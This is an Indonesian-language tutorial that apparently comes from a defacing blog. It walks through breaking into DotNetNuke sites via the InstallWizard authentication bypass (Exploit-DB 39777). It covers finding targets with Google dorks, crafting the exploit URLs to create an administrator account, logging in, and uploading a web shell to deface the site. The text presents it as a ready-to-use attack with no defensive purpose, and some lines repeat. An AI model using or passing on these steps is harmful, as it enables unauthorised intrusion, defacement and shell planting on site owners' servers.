Pada kesempatan Kali ini saya akan memberikan Tutorial Deface metode DotNetNuke - Administration Authentication Bypass, Sebelum deface sebaiknya kita mempersiapkan alat dan bahan
-Script deface
-Exploit number 39777 https://www.exploit-db.com/exploits/39777/
-Exploit number 39777 https://www.exploit-db.com/exploits/39777/
-Dork
Use Your Brain
Use Your Brain
Langsung saja simak tutorialnya
1. Dorking site dulu di google
2. Jika sudah masukkan exploitnya menjadi seperti ini
site.co.li/Install/InstallWizard.aspx?__VIEWSTATE=
site.co.li/Install/InstallWizard.aspx?__VIEWSTATE=
3. Jika ada register. Kalian register aja dengan benar
4. Jika sudah hapus __VIEWSTATE=
5. Dan tambahkan culture=en-US&executeinstall pada bagian aspx menjadi seperti ini
- site.co.li/Install/InstallWizard.aspx?culture=en-US&executeinstall
6. Langkah terakhir tinggal login saja
untuk login ada 2 yaitu di default web utama dan menggunakan exploit satu ini
/Home/tabid/36/ctl/Login/Default.aspx
untuk login ada 2 yaitu di default web utama dan menggunakan exploit satu ini
/Home/tabid/36/ctl/Login/Default.aspx
7. Masukkan username dan password yg kalian daftarkan tadi
8. Jika sudah login cari tempat upload shell
9. Selamat anda sudah berhasil .
Mungkin hanya itu yg saya bisa berikan pada tutorial hari ini semoga dapat bermanfaat buat kalian semua .
Sekian dan Terimakasih Wassalamualaikum Wr.Wb